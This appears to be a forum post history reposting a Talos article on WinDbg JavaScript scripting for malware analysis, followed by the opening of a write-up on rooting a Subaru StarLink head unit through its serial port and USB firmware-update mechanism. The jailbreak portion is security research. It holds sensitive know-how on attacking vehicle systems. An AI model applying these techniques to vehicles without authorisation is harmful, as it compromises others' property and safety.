Everything posted by Nytro
-
Monday, February 18, 2019

JavaScript bridge makes malware analysis with WinDbg easier

Introduction

As malware researchers, we spend several days a week debugging malware in order to learn more about it. We have several powerful and popular user mode tools to choose from, such as OllyDbg, x64dbg, IDA Pro and Immunity Debugger. All these debuggers offer some scripting language to automate tasks, such as Python or proprietary languages like OllyScript. When it comes to analyzing in kernel mode, there is really one option: the Windows debugging engine and its interfaces CDB, NTSD, KD and WinDbg.

Unfortunately, even if WinDbg is the most user-friendly of the bunch, it is widely considered one of the least user-friendly debuggers in the world. The learning curve for WinDbg commands is quite steep, as it combines an unintuitive and often conflicting command syntax with an outdated user interface. Adding the traditional WinDbg scripting language to this equation does not make things easier for the user, as it creates an additional layer of complexity by introducing its own idiosyncrasies.

Thankfully, there's a new WinDbg Preview for Windows 10 that brings it in line with modern programming environments such as Visual Studio, using already familiar elements of the user interface. This preview includes a new JavaScript engine and exposes the debugger data model through a set of JavaScript objects and functions.

In this post, we'll go over this new version of WinDbg's debugger data model and its new interface with JavaScript and dx commands.

Debugger data model

The debugger data model is an extensible object model that allows debugger extensions, as well as the WinDbg user interface, to access a number of internal debugger objects through a consistent interface. The objects relevant for malware analysis exposed through the data model are:

    Debugging sessions
    Processes
    Process environment (e.g. Peb and Teb)
    Threads
    Modules
    Stack frames
    Handles
    Devices
    Code (disassembler)
    File system
    Debugger control
    Debugger variables
    Pseudo registers

dx display expression

All the above types of objects are exposed through a new command, dx (display debugger object model expression), which can be used to access objects and evaluate expressions using a C++-like syntax, in a simpler and more consistent way than the one exposed through the somewhat confusing mix of the MASM and C++ expression evaluators. Thanks to the addition of the NatVis functionality to WinDbg, the results of the dx command are displayed in a much more user-friendly way, using intuitive formatting with DML as the default output.

The starting point for exploring the dx command is simply to type dx Debugger in the WinDbg command window, which will show the top-level namespaces in the exposed data model. Those four namespaces are Sessions, Settings, State and Utility. DML generates output using hyperlinks, allowing the user to drill down into the individual namespaces simply by clicking on them. For example, by clicking on the Sessions hyperlink, the command dx -r1 Debugger.Sessions will be executed and its results displayed.

[Figure: Drilling down from the top-level namespaces to processes]

If we go a couple of layers further down, which can also be controlled with the -r option of the dx command, we will get to the list of all processes and their properties, including the _EPROCESS kernel object fields exposed as the member KernelObject of a Process debugger object. Users of earlier WinDbg versions will certainly appreciate the new ease of investigation available through the dx command.

The dx command also supports tab completion, which makes navigating the data model even easier and allows the user to learn about the operating system and WinDbg internals such as debugger variables and pseudo-registers.
For example, to iterate through the list of internal debugger variables you can type dx @$ and then repeatedly press the Tab key, which will cycle through all defined pseudo-registers, starting from $argreg.

Pseudo-registers and internal variables are useful if we want to avoid typing full object paths after the dx command. Instead of Debugger.Sessions[0] you can simply use the pseudo-register @$cursession, which points to the current session data model object. If you need to work with the current process you can simply type dx @$curprocess instead of the longer dx Debugger.Sessions[0].Processes[procid].

Linq queries

Linq (Language Integrated Query) is an already familiar concept for .NET software engineers that allows the user to create SQL-like queries over the object collections exposed through the dx command.

There are two syntaxes available for creating Linq expressions in normal .NET development, but WinDbg, through the dx command, only supports queries written in the Lambda expression syntax. Linq queries allow us to slice and dice the collection objects and extract the pieces of information we are interested in displaying.

The Linq function "Where" allows us to select only those objects which satisfy a condition specified by the Lambda expression supplied as the function argument. For example, to display only processes which have the string "Google" in the name, we can type:

    dx @$cursession.Processes.Where(p => p.Name.Contains("Google"))

Just like in SQL, the "Select" function allows us to choose which members of an object in the collection we would like to display.
For example, for the processes we already filtered using the "Where" function, we can use "Select" to retrieve only the process name and its ID:

    dx -r2 @$cursession.Processes.Where(p => p.Name.Contains("Google")).Select(p => new { Name = p.Name, Id = p.Id })

Going one level deeper, into the exposed _EPROCESS kernel object, we can choose to display a subset of handles owned by the process under observation. For example, one of the methods to find processes hidden by a user mode rootkit is to enumerate process handles of the Windows client server subsystem process (csrss.exe) and compare that list with a list generated using a standard process enumeration command.

Before we list the processes in the csrss.exe handle table, we need to find the csrss.exe process object(s) and, once we find them, switch into their context:

    dx @$cursession.Processes.Where(p => p.Name.Contains("csrss.exe"))[pid].SwitchTo()

We can now run a Linq query to display the paths to the main module of the processes present in the csrss.exe handle table:

    dx @$curprocess.Io.Handles.Where(h => h.Type.Contains("Process")).Select(h => h.Object.UnderlyingObject.SeAuditProcessCreationInfo.ImageFileName->Name)

Since ImageFileName is a pointer to a structure of the type _OBJECT_NAME_INFORMATION, we need to use the arrow to dereference it and access the "Name" field containing the module path.

There are many other useful Linq queries. For example, users can order the displayed results based on some criteria, which is similar to the Order By SQL clause, or count the results of the query using the "Count" function. Linq queries can also be used in the JavaScript extension, but their syntax is once again slightly different. We will show an example of using Linq within JavaScript later in the blog post.

WinDbg and JavaScript

Now that we've covered the basics of the debugger data model and the dx command used to explore it, we can move on to the JavaScript extension for WinDbg.
Jsprovider.dll is a native WinDbg extension allowing the user to script WinDbg and access the data model using a version of Microsoft's Chakra JavaScript engine. The extension is not loaded by default into the WinDbg process space; it must be loaded manually. This avoids potential clashes with other JavaScript-based extensions. Jsprovider is loaded using the standard command for loading extensions:

    .load jsprovider.dll

While this post discusses conventional scripts a threat researcher may create while analysing a malware sample, it is worth mentioning that the JavaScript extension also allows developers to create WinDbg extensions that feel just like existing binary extensions. More information about creating JavaScript-based extensions can be found by investigating one of the extensions provided through the official GitHub repository of WinDbg JavaScript examples.

WinDbg Preview contains a fully functional Integrated Development Environment (IDE) for writing JavaScript code, allowing the developer to refactor their code while debugging a live program or investigating a memory dump.

The following WinDbg commands are used to load and run JavaScript-based scripts. The good news is that they are more intuitive than the awkward standard syntax for managing WinDbg scripts:

    .scriptload loads a JavaScript script or an extension into WinDbg but does not execute it.
    .scriptrun runs the loaded script.
    .scriptunload unloads the script from WinDbg and from the debugger data model namespace.
    .scriptlist lists all currently loaded scripts.

JavaScript entry points

Depending on the script command used to load the script, the JavaScript provider will call one of the predefined user script entry points or execute the code at the script root level.

From the point of view of a threat researcher, there are two main entry points.
The first is a kind of script constructor function named initializeScript, called by the provider when the .scriptload command is executed. The function is usually used to initialize global variables and to define constants, structures and objects. The objects defined within the initializeScript function will be bridged into the debugger data model namespaces using the functions host.namespacePropertyParent and host.namedModelParent. The bridged objects can be investigated using the dx command like any other native object in the data model.

The second, and even more important, entry point is the function invokeScript, an equivalent of the C function main. This function is called when the user executes the .scriptrun WinDbg command.

Useful tricks for JavaScript exploration

Now we will assume that we have a script named "myutils.js" where we keep a set of functions we regularly use in our day-to-day research. First, we need to load the script using the .scriptload command.

[Figure: Loading script functions from the user's Desktop folder]

WinDbg JavaScript modules and namespaces

The main JavaScript object we use to interact with the debugger is the host object. If we are using the WinDbg Preview script editor, the IntelliSense tab completion and function documentation feature will help us learn the names of the available functions and members.

[Figure: IntelliSense in action]

If we just want to experiment, we can put our code into the invokeScript function, which will get called every time we execute the script. Once we are happy with the code, we can refactor it and define our own set of functions.

Before we dig deeper into the functionality exposed through the JavaScript interface, it is recommended to create two essential helper functions for displaying text on the screen and for interacting with the debugger using standard WinDbg commands.
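A minimal sketch of a script with both entry points and two such helpers might look like the following. The names logme and exec follow the post; the bodies are an assumption, since the original listing was published as an image. The console fallback and the inDebugger flag are illustrative additions so that the file also runs outside WinDbg, where the host object does not exist.

```javascript
"use strict";

// The WinDbg JavaScript provider injects a global `host` object.
// Outside the debugger (for example under Node.js) it is undefined,
// so the helpers fall back to console output (illustrative assumption).
const inDebugger = typeof host !== "undefined";

// Print one line of text to the debugger command window.
function logme(text) {
    if (inDebugger) {
        host.diagnostics.debugLog(text + "\n");
    } else {
        console.log(text);
    }
}

// Run a standard WinDbg command and return its output lines.
function exec(command) {
    if (!inDebugger) {
        return []; // nothing to execute outside the debugger
    }
    return host.namespace.Debugger.Utility.Control.ExecuteCommand(command);
}

// Called by the provider when the script is loaded with .scriptload.
function initializeScript() {
    logme("myutils.js loaded");
}

// Called by the provider when the script is run with .scriptrun.
function invokeScript() {
    // "lm" is the standard WinDbg command that lists loaded modules.
    for (const line of exec("lm")) {
        logme(line);
    }
}
```

Keeping the wrappers this thin means the rest of a script can call logme and exec without repeating the full namespace path.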
They will be helpful for interaction with the user and for working around functionality that we need for debugging but that is not yet natively present in JavaScript. In this example, we named these functions logme and exec. They are more or less just wrappers around the JavaScript functions, with the added advantage that we don't need to type the full namespace hierarchy in order to reach them.

[Figure: Helper functions wrapping parts of the JavaScript WinDbg API]

In the function exec, we see that by referencing the host.namespace.Debugger namespace, we are able to access the same object hierarchy through JavaScript as we would with the dx command from the WinDbg command line.

The ExecuteCommand function executes any of the known WinDbg commands and returns the result in a plain text format which we can parse to obtain the required results. This approach is not much different from the approach available in the popular Python-based WinDbg extension pykd. However, the advantage of Jsprovider over pykd is that most of the JavaScript extension functions return JavaScript objects that do not require any additional parsing in order to be used for scripting.

For example, we can iterate over a collection of process modules by accessing the host.currentProcess.Modules iterable. Each member of the iterable is an object of class Module and we can display its properties, in this case the name. It is worth noting that IntelliSense is not always able to display all members of a JavaScript object, and that is when the for-in loop statement can be very useful. This loop allows us to iterate through the names of all the object members, which we can print to help during exploration and development.

[Figure: Displaying the members of a Module object]

On the other hand, the for-of loop statement iterates through all members of an iterable object and returns their values. It is important to remember the distinction between these two for loop forms.
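The difference between the two loop forms can be tried outside the debugger. The sketch below uses a made-up array, mockModules, as a stand-in for host.currentProcess.Modules; the member names and values are illustrative assumptions, not real debugger output.

```javascript
// Stand-in for the debugger's module collection (hypothetical data).
const mockModules = [
    { Name: "ntdll.dll", BaseAddress: 0x7ff800000000, Size: 0x1f0000 },
    { Name: "kernel32.dll", BaseAddress: 0x7ff7f0000000, Size: 0xb2000 },
];

// for-in walks the NAMES of an object's members, which is useful for
// discovering what an unfamiliar object exposes.
function memberNames(obj) {
    const names = [];
    for (const name in obj) {
        names.push(name);
    }
    return names;
}

// for-of walks the VALUES produced by an iterable, here one module per step.
function moduleNames(modules) {
    const names = [];
    for (const mod of modules) {
        names.push(mod.Name);
    }
    return names;
}

console.log("Members: " + memberNames(mockModules[0]).join(", "));
console.log("Modules: " + moduleNames(mockModules).join(", "));
```

Inside WinDbg the same two loops would be pointed at a real Module object and at the Modules iterable respectively.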
[Figure: Printing list of modules loaded into the current process space]

We can also fetch a list of loaded modules by iterating through the Process Environment Block (PEB) linked list of loaded modules, although this requires more preparation to convert the linked list into a collection by calling the JavaScript function host.namespace.Debugger.Utility.Collections.FromListEntry.

Here is a full listing of a function which converts the linked list of loaded modules into a JavaScript collection of modules and displays their properties.

    function ListProcessModulesPEB() {
        // Iterate through the list of loaded modules in the PEB using the FromListEntry utility function
        for (var entry of host.namespace.Debugger.Utility.Collections.FromListEntry(
                host.currentProcess.KernelObject.Peb.Ldr.InLoadOrderModuleList, "nt!_LIST_ENTRY", "Flink")) {
            // Create a new typed object from the _LIST_ENTRY address and treat it as an _LDR_DATA_TABLE_ENTRY
            var loaderdata = host.createTypedObject(entry.address, "nt", "_LDR_DATA_TABLE_ENTRY");
            // Print the module name, its virtual address and its size
            logme("Module " + host.memory.readWideString(loaderdata.FullDllName.Buffer) + " at " +
                loaderdata.DllBase.address.toString(16) + " Size: " + loaderdata.SizeOfImage.toString(16));
        }
    }

This function reads values from process memory by accessing the host.memory namespace and calling one of the functions readMemoryValues, readString or readWideString, depending on the type of data we need to read.

JavaScript 53-bit integer width limitation

Although programming WinDbg using JavaScript is relatively simple compared to standard WinDbg scripts, we need to be aware of a few facts that may cause headaches. The first is that the width of JavaScript integers is limited to 53 bits, which may cause some issues when working with native 64-bit values. For that reason, the JavaScript extension has a special class, host.Int64, whose constructor needs to be called when we want to work with 64-bit numbers.
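The limitation itself is a property of JavaScript numbers and can be observed outside the debugger. The sketch below is plain JavaScript; the address is a made-up example, and BigInt is used only to show the exact value. Whether BigInt is available inside the WinDbg JavaScript provider is not assumed here.

```javascript
// Largest integer a JavaScript Number can represent exactly: 2^53 - 1.
const maxSafe = Number.MAX_SAFE_INTEGER;

// Past that point neighbouring integers collapse onto the same value.
const collapsed = (2 ** 53) === (2 ** 53 + 1);

// A made-up 64-bit kernel-style address. As a Number literal it is silently
// rounded; as a BigInt literal it is kept exactly.
const asNumber = 0xfffff80312345679;
const exact = 0xfffff80312345679n;

console.log("Max safe integer: " + maxSafe);
console.log("2^53 equals 2^53 + 1: " + collapsed);
console.log("Number kept the address exactly: " + (BigInt(asNumber) === exact));
console.log("Exact value: 0x" + exact.toString(16));
```

This is the behaviour that host.Int64 exists to avoid when pointers and other 64-bit values are handled in a script.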
Luckily, the interpreter will warn us when a 53-bit overflow can occur. A host.Int64 object has a number of functions that allow us to execute arithmetic and bitwise operations on it. When trying to create a function to iterate through the array of callbacks stored in PspCreateProcessNotifyRoutine, shown later in the post, I was not able to find a way to apply a 64-bit wide And bitmask. The masking function seemed to revert to the 53-bit width, which would create an overflow if the mask was wider than 53 bits.

[Figure: Masking a host.Int64 with a 53-bit And mask yields a correct result, and an incorrect one if the mask is wider]

Luckily, there are the functions getLowPart and getHighPart, which respectively return the lower or upper 32 bits of a 64-bit integer. This allows us to apply the And mask we need and get back the required 64-bit value by shifting the higher 32-bit value to the left by 32 and adding the lower 32 bits to it.

The 53-bit limitation of the WinDbg JavaScript implementation is an annoyance, and it would be very welcome if the WinDbg team could find a way to overcome it and support 64-bit numbers without resorting to the special JavaScript class.

Linq in JavaScript

We have already seen how Linq queries can be used to access a subset of debugger data model objects and their members using the dx command.

However, their syntax in JavaScript is slightly different: the user has to supply, as the argument to a Linq verb function call, either an expression or an anonymous function that returns the required data type.

For example, for the "Where" Linq clause, the returned value has to be a boolean. For the "Select" clause, we need to supply a member of the object we would like to select, or a new anonymous object composed of a subset of the queried object's members.
Here is a simple example using Linq functions. It filters a list of modules to keep only those whose name contains the string "dll" and selects only the module name and its base address for display.

    function ListProcessModules() {
        // An example of how to use Linq queries in JavaScript.
        // Instead of a Lambda expression, supply a function which returns a boolean for the Where clause, or
        // a new object with selected members of the object we are looking at (in this case a Module) for Select.
        let mods = host.currentProcess.Modules
            .Where(function (k) { return k.Name.includes("dll"); })
            .Select(function (k) { return { name: k.Name, adder: k.BaseAddress }; });
        for (var lk of mods) {
            logme(lk.name + " at " + lk.adder.toString(16));
        }
    }

Inspecting operating system structures

A good starting point for getting the addresses of kernel functions and structures is the function host.getModuleSymbolAddress. If we need the actual value stored at the retrieved symbol, we need to dereference the address using the host.memory.readMemoryValues function, or the dereference function for a single value.

Here is an example enumerating callbacks registered using the documented PsSetCreateProcessNotifyRoutine kernel function, which registers driver functions that will be notified every time a process is created or terminated. The registered callbacks are stored in the kernel's PspCreateProcessNotifyRoutine array. This mechanism is also used by kernel mode malware, for hiding processes or for preventing the user mode modules of the malware from being terminated.

The example in the post is inspired by the C code for enumerating callbacks implemented in the SwishDbgExt extension developed by Matthieu Suiche. This WinDbg extension is very useful for analysing systems infected by kernel mode malware, as well as kernel memory dumps.

The code shows that even more complex functions can be implemented relatively easily using JavaScript. In fact, development using JavaScript is ideal for malware researchers, as writing code, testing and analysis can all be performed in parallel using the WinDbg Preview IDE.
    function ListProcessCreateCallbacks() {
        let PspCreateNotifyRoutinePointer = host.getModuleSymbolAddress("ntkrnlmp", "PspCreateProcessNotifyRoutine");
        let PspCreateNotify = host.memory.readMemoryValues(PspCreateNotifyRoutinePointer, 1, 8);
        let PspCallbackCount = host.memory.readMemoryValues(
            host.getModuleSymbolAddress("ntkrnlmp", "PspCreateProcessNotifyRoutineCount"), 1, 4);
        logme("There are " + PspCallbackCount.toString() + " PspCreateProcessNotify callbacks");
        for (let i = 0; i < PspCallbackCount; i++) {
            let CallbackRoutineBlock = host.memory.readMemoryValues(PspCreateNotifyRoutinePointer.add(i * 8), 1, 8);
            let CallbackRoutineBlock64 = host.Int64(CallbackRoutineBlock[0]);
            // A workaround seems to be required here to bitwise mask the lowest 4 bits.
            // Get the lower 32 bits of the address we need to mask and mask them to get the lower 32 bits
            // of the pointer to the _EX_CALLBACK_ROUTINE_BLOCK (undocumented structure known in ReactOS)
            let LowCallback = host.Int64(CallbackRoutineBlock64.getLowPart()).bitwiseAnd(0xfffffff0);
            // Get the upper 32 bits of the address we need to mask and shift them left to create a 64-bit value
            let HighCallback = host.Int64(CallbackRoutineBlock64.getHighPart()).bitwiseShiftLeft(32);
            // Add the two values to get the address of the i-th _EX_CALLBACK_ROUTINE_BLOCK
            let ExBlock = HighCallback.add(LowCallback);
            // Finally, jump over the first member of the structure (a quadword) to read the address of the callback
            let Callback = host.memory.readMemoryValues(ExBlock.add(8), 1, 8);
            // Use the .printf trick to resolve the symbol and print the callback
            let rez = host.namespace.Debugger.Utility.Control.ExecuteCommand(".printf \"%y\n\", " + Callback.toString());
            // Print the function name using the first line of the response of the .printf command
            logme("Callback " + i + " at " + Callback.toString() + " is " + rez[0]);
        }
    }

Here we see the manipulation of the 64-bit address mentioned above.
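The split-and-recombine idea can be checked outside the debugger. The sketch below is plain JavaScript and uses BigInt as a stand-in for host.Int64; the function names splitParts and maskLowNibble and the sample value are hypothetical, chosen only to illustrate clearing the lowest 4 bits through two 32-bit halves.

```javascript
// Split a 64-bit value into its lower and upper 32-bit halves, mirroring
// what getLowPart and getHighPart return for a host.Int64.
function splitParts(value64) {
    const low = Number(value64 & 0xffffffffn);
    const high = Number((value64 >> 32n) & 0xffffffffn);
    return { low, high };
}

// Clear the lowest 4 bits by masking only the low half, then rebuild the
// 64-bit value as (high << 32) + maskedLow.
function maskLowNibble(value64) {
    const { low, high } = splitParts(value64);
    // JavaScript bitwise operators work on signed 32-bit integers;
    // ">>> 0" converts the result back to an unsigned 32-bit value.
    const maskedLow = (low & 0xfffffff0) >>> 0;
    return (BigInt(high) << 32n) + BigInt(maskedLow);
}

const sample = 0xffffe001a2b3c4dfn; // hypothetical tagged pointer
console.log("Masked: 0x" + maskLowNibble(sample).toString(16));
```

Because each half fits in 32 bits, neither the mask nor the intermediate results ever approach the 53-bit limit.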
We split a 64-bit value into its upper and lower 32 bits and apply the bitmask separately to avoid a 53-bit JavaScript integer overflow.

Another interesting point is the use of the standard debugger command .printf to do a reverse symbol resolution. Although the JavaScript function host.getModuleSymbolAddress allows us to get the address of the required symbol, as of writing this blog post there are no functions which allow us to get the symbol name from an address. That is why the .printf workaround is used, with the %y format specifier, which returns a string containing the name of the specified symbol.

Debugging the debugging scripts

Developers of scripts in any popular language know that successful development also requires a set of tools for debugging. The debugger needs to be able to set breakpoints and inspect the values of variables and objects. This is also required when we are writing scripts that need to access various operating system structures or to analyse malware samples. Once again, the WinDbg JavaScript extension delivers the required functionality in the form of a debugging tool whose commands will be very familiar to all regular WinDbg users.

The debugger is launched by executing the command .scriptdebug, which prepares the JavaScript debugger for debugging a specific script. Once the debugger has loaded the script, we have the option to choose the events which will cause the debugger to stop, as well as to set breakpoints on specific lines of script code.

The command sxe within the JavaScript debugger is used, just as in WinDbg, to define the events after which the debugger will break. For example, to break on the first executed line of a script we simply type sxe en. Once the command has successfully executed, we can inspect the status of all available events by using the command sx.
[Figure: sx shows the JavaScript debugger's breaking status for various exceptions]

Now, we also have an opportunity to specify the line of the script where a breakpoint should be set using the command bp, just as in standard WinDbg syntax. To set a breakpoint, the user needs to specify a line number together with the position on the line, for example bp 77:0. If the specified line position is 0, the debugger automatically sets the breakpoint on the first possible position on the line, which saves us from counting the required breakpoint positions.

[Figure: Setting a breakpoint on line position 0 sets it on the first possible position]

Now that we have set up all the required breakpoints, we have to exit the debugger, which is a slightly unintuitive step. The debugging process continues after calling the script, either by accessing the WinDbg variable @$scriptContents and calling any of the functions of the script we wish to debug, or by launching the script using .scriptrun as usual. Naturally, the @$scriptContents variable is accessed using the dx command.

[Figure: Scripts can be launched for debugging using the @$scriptContents variable]

The debugger contains its own JavaScript evaluator command, ??, which allows us to evaluate JavaScript expressions and inspect the values of the script's variables and objects.

[Figure: The commands ? and ?? are used to display the results of JavaScript expressions]

JavaScript debugging is a powerful tool required for proper development. Although it is already sufficient in early versions of the JavaScript extension, we hope that it will become richer and more stable over time, as WinDbg Preview moves closer to its full release.

Conclusion

We hope that this post provided you with a few pointers to functionality useful for malware analysis available through the official Microsoft JavaScript WinDbg extension.
Although the API exposed through JavaScript is not complete, there are usually ways to work around the limitations by wrapping standard WinDbg commands and parsing their output. This solution is not ideal, and we hope that new functionality will be added directly to the JavaScript provider to make the scripting experience even more user-friendly.

The Debugging Tools for Windows development team seems to be committed to adding new JavaScript modules, as was recently demonstrated through the addition of file system interaction and the Code namespace module. These open a whole new set of possibilities for code analysis, which we may be able to cover in one of our next posts. Interested readers are invited to check out the CodeFlow JavaScript extension made available through the official examples repository on GitHub.

If you would like to learn a few more tips on malware analysis using WinDbg and JavaScript, Cisco Talos will be presenting a session at the CARO Workshop in Copenhagen in May.

Posted by Vanja Svajcer at 12:29 PM

Sursa: https://blog.talosintelligence.com/2019/02/windbg-malware-analysis-with-javascript.html#more
-
Jailbreaking Subaru StarLink

Another year, another embedded platform. This exercise, while perhaps less important than the medical security research I've worked on in the past, is a bit more practical and entertaining. What follows is a technical account of gaining persistent root code execution on a vehicle head unit.

Table of Contents

Jailbreaking Subaru StarLink Table of Contents Introduction Shared Head Unit Design Existing Efforts SSH Finding the Manufacturer Harman and QNX Dr. Charlie Miller & Chris Valasek's Paper First Recap Analysis of Attack Surfaces USB Update Mechanism On My Warranty Hardware Analysis Board Connectors Serial Port Installing the Update Firmware swdl.iso IFS Files ifs-subaru-gen3.raw Contents Files of Note minifs.ifs Contents ISO Modification Reverse Engineering QNXCNDFS installUpdate Flow cdqnx6fs Cluster Table Cluster Data Decrypting Key Generation Emulation Cluster Decryption Cluster Decompression Mounting the Image The Extents Section Understanding the Extents Final Decompression system.dat ifs_images Back to QNXCNDFS The Shadow File Non-privileged Code Execution Image Creation Root Escalation Backdooring SSH Putting it All Together CVE-2018-18203 Next Steps Notes from Subaru and Harman Note from Subaru Note from Harman Conclusion

Introduction

Back in June, I purchased a new car: the 2018 Subaru Crosstrek. This vehicle has an interesting head unit that's locked down and running a proprietary, non-Android operating system. Let's root it.

If this were Android, we could most likely find plenty of pre-existing PoCs and gain root rather trivially, as most vehicle manufacturers never seem to update Android. Because this isn't an old Android version, we'll have to put a little more work in than usual.

Shared Head Unit Design

In 2017, Subaru launched a new version of their StarLink head unit on the Impreza. The same head unit appears to be used on the 2018+ Crosstrek, as well as the latest Forester and Ascent.
If we can root the base device, we can potentially root every head unit on every vehicle sharing the same platform.

There are a few SKUs for the head units on the Crosstrek and Impreza. The cheapest model has a 6-inch screen. A higher trim model has an 8-inch screen, and the top of the line model has the 8-inch screen as well as an embedded GPS mapping system. All models support Apple Carplay and Android Auto. The 8-inch models can connect to WiFi networks and theoretically download firmware updates wirelessly, but this functionality doesn't seem to be in use yet.

Existing Efforts

Starting from scratch, we know virtually nothing about the head unit. There are no obvious debugging menus, no firmware versions listed anywhere, and no clear manufacturer.

First, we need to research and find out if anyone else has already accomplished this or made any progress understanding the unit. The only useful data was posted by redditor nathank1989. See his post in /r/subaruimpreza, and, more importantly, the replies. To quote his post:

    SSH Into STARLINK
    Just got myself the 2017 Impreza Sport and can see there's an open SSH server. Kudos to the person who knows what is or how to find the root user and password. 2 hours of googling has yielded nothing.

SSH is a good sign: we're most likely running some sort of Unix variant.

Further down in the Reddit post, we have a link to a firmware update. This will save us time, as getting access to a software update is sometimes quite difficult with embedded systems. Subaru later took this firmware update down. They had linked to it from the technical service manuals you can purchase access to through Subaru. It appears that Subarunet did not originally require any form of authentication to download files. I did not get the files from this link as they were down by the time I found the thread, but the files themselves had been mirrored by many Subaru enthusiasts.
These files can be placed on a USB thumb drive, inserted into the vehicle's USB ports, and the firmware installed on the head unit.

Aside from this, there really isn't much information out there.

SSH

What happens if we connect to SSH over WiFi?

    ****************************** SUBARU *******************************
    Warning - You are knowingly accessing a secured system. That means you are liable for any mischeif you do.
    *********************************************************************
    root@192.168.0.1's password:

Dead end. Brute forcing is a waste of time, and finding an exploit that would only work on the top tier of navigation models with WiFi isn't practical.

Finding the Manufacturer

We can find the manufacturer (Harman) in several different ways. I originally discovered it was Harman after I searched several auction sites for Subaru Impreza head units stripped out of wrecked vehicles. There were several for sale that had pictures showing stickers on the removed head unit with serial numbers, model numbers, and, most importantly, the fact that Harman manufactures the device.

Another way would be to remove the head unit from a vehicle, but I'm not wealthy enough to void the warranty on a car I enjoy, and I've never encountered a dash that comes out without tabs breaking.

The technical manuals you can pay for most likely have this information as well as the head unit pinout.

Hidden debug and dealer menus are accessible via key combinations. One of these menus hints that the device is running QNX and is from Harman. See another useful Reddit post by ar_ar_ar_ar. From the debug menu, we know we're running QNX 6.60.

Harman and QNX

Now that we know the manufacturer and OS, we can expand the search a bit. There are a few interesting publications on Harman head units, and one of them is both useful and relatively up-to-date.

Dr. Charlie Miller & Chris Valasek's Paper

Back in 2015, Dr.
Charlie Miller and Chris Valasek presented their automotive research at Blackhat: Remote Exploitation of an Unaltered Passenger Vehicle. This is, by far, the best example of public research on Harman head units. Thank you to Dr. Miller and Chris for publishing far more details than necessary. The paper covers quite a few basics of Harman's QNX system and even shows the attacks they used to gain local code execution. Although the system has changed a bit since then, it is still similar in many ways and the paper is well worth reviewing.

First Recap

At this point, we know the following:

    This is a Harman device.
    It is running QNX 6.60.
    We have a firmware image.

Analysis of Attack Surfaces

Where do we begin? We can attack the following systems, listed by approximate difficulty, without having to disassemble the vehicle:

    Local
        USB Update Mechanism
        USB Media Playback (metadata decoding?)
        OBD?
        iPod Playback Protocol
        Carplay/Android Auto Interfaces
        CD/DVD Playback & Metadata Decoding
    Wireless
        WiFi
        Bluetooth
        FM Traffic Reception / Text Protocols

There are more vectors, but attacking them often isn't practical at the hobbyist level.

USB Update Mechanism

The biggest attack vector (but not necessarily the most important) on a vehicle head unit is almost always the head unit software update mechanism. Attackers need a reliable way to gain access to the system to explore it for other vulnerabilities. Assuming it can be done, spoofing a firmware update is going to be a much more "global" rooting mechanism than any form of memory corruption or logic errors (barring silly mistakes like open Telnet ports/DBUS access/trivial peek/poke etc.). Thus, finding a flaw like this would be enormously valuable from a vulnerability research perspective.

On My Warranty

If we're going to start attacking an embedded system, we probably shouldn't attack the one in a real, live vehicle used to drive around town.
More than likely nothing bad would happen assuming correct system design and architecture (a safe assumption?), but paying to have the dealer replace the unit would be very expensive. This could also potentially impact the warranty, which could be cost-prohibitive. Auction sites have plenty of these for sale from salvage yards for as low as $200. That's a fantastic deal for a highly proprietary system with an OEM cost of more than $500.

Hardware Analysis

Before we look at the firmware images we grabbed earlier, let's evaluate the hardware platform. This is pretty standard for embedded systems.

First, figure out how to power on the system. We need a DC power supply for the Subaru head unit as well as the wiring diagram for the back of the unit in order to know what to attach the power leads to. I didn't feel like paying the $30 for access to the technical manual, so I searched auction sites for a while, eventually found a picture of the wiring harness, noted that the harness had one wire that was much thicker than the others, guessed that was probably power, attached the leads, prayed, and powered the unit on. I don't recommend doing that, but it worked this time.

Next, disassemble the device and inventory the chips on the system. Important parts:

- ARM processors.
- USB ports. (These correspond to the USB ports in the car for iPhone attachment etc.)
- Unpopulated orange connectors. (Interesting!)
- 32GB eMMC.

The eMMC is a notable attack vector. With unlimited time and money, we could dump its contents by attaching to test points on nearby leads or by desoldering the entire package. Unfortunately, I don't have the equipment for this. At minimum I'd want a rather expensive stereo microscope, and that isn't worth the cost to me. One could potentially root the device by desoldering, dumping, modifying a shadow file, reflashing, and resoldering. A skilled technician (i.e. professional attacker) in a well-equipped lab could do this trivially.
Board Connectors

There are strange-looking orange connectors with Kapton tape covering them. How do we identify the connectors so we can easily probe the pins? We could trawl through tiny, black and white DigiKey pictures for a while and hopefully get lucky, but asking electronics.stackexchange.com is far simpler. I posted the question and had many members helpfully identify the connector as Micromatch in less than an hour. Fantastic.

Order cable assemblies from DigiKey, attach them, then find the 9600 or 115200 baud serial port every embedded system under the sun always has. Always.

Serial Port

SUBARU Base, date:Jul 11 2017
Using eMMC Boot Area
loader in 79 ms
�board_rev = 6
Startup: time between timer readings (decimal): 39378 useconds
Welcome to QNX 660 on Harman imx6s Subaru Gen3 ARM Cortex-A9 MPCore
login: RVC:tw9990_fast_init: Triggered TW9990 HW Reset
RVC:tw9990_fast_init: /dev/i2c4 is ready
WFDpixel_clock_kHz: 29760
WFDhpixels: 800
WFDhfp: 16
WFDhsw: 3
WFDhbp: 45
WFDvlines: 480
WFDvfp: 5
WFDvsw: 3
WFDvbp: 20
WFDflags: 2
RVC:tw9990_fast_init: Decoder fast init completed
[Interrupt] Attached irqLine 41 with id 20.
[Interrupt] Attached irqLine 42 with id 21.
root
root
Password:
Login incorrect

Serial has a username and password. A good guess is that it's using the exact same credentials as the SSH server. Another dead end.

At this point I tried breaking into some form of bootloader on boot via keystrokes and grounding various chips, but no luck. There are other pins, so we could look for JTAG, but since we have a firmware update package, let's investigate that first. JTAG would involve spending more money, and part-time embedded security research isn't exactly the most lucrative career choice.

Installing the Update

To install the update, we first need to solder on a USB socket so we can insert a flash drive into the test setup. Subaru seems to sell these cables officially for around $60.
The cheaper way is to splice a USB extension cord and solder the four leads directly to the board. After doing this step, the system accepts the downloaded update.

The device I purchased from a salvage yard actually had a newer firmware version than the files I got from various Subaru forums. The good news is that the system supports downgrading and does not appear to reject older firmware. It also happily reinstalls the same firmware version on top of itself.

Now onto the firmware analysis stage.

Firmware

Here's what the update package has:

BASE-2017MY Impreza Harman Audio Update 06-2017/update/KaliSWDL$ ls -lash
total 357M
0 drwxrwxrwx 1 work work 4.0K Jun 7 2017 .
0 drwxrwxrwx 1 work work 4.0K Jun 7 2017 ..
4.0K -rwxrwxrwx 1 work work 1.8K Jun 7 2017 checkswdl.bat
44K -rwxrwxrwx 1 work work 43K Jun 7 2017 KaliSWDL.log
784K -rwxrwxrwx 1 work work 782K Jun 7 2017 md5deep.exe
